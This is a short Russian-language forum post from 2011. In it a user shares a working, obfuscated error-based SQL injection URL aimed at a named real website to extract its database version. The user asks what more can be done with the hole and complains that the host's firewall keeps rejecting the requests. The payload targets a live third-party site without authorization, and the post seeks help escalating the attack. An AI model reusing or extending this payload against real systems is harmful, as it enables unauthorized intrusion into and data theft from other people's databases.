19.09.2011, 18:35
|
|
Участник форума
Регистрация: 07.07.2008
Сообщений: 161
С нами:
9391926
Репутация:
234
|
|
Что можно сделать если есть вот такая sql injection:
Код:
http://mirplombir.ru/index.php?searchstring=1\\%27%29%29or%28SELECT%28COUNT%28*%29%29FR%20%20OM%28%28SELECT%281%29%29UNION%28SELECT%282%29%29UNION%28SELECT%283%29%29%29x/**/GROUP/**/BY/**/MID%28VERSION%28%29,FLOOR%28RAND%280%29*2%29,64%29%29%23%20UNION%20SELECT%201%20--%20%20%27
При этом во время моих экспериментов часто перебрасывает на сайт хостера, где написано
Сообщение от None
Запрос небезопасен и был отвергнут.
|
|
|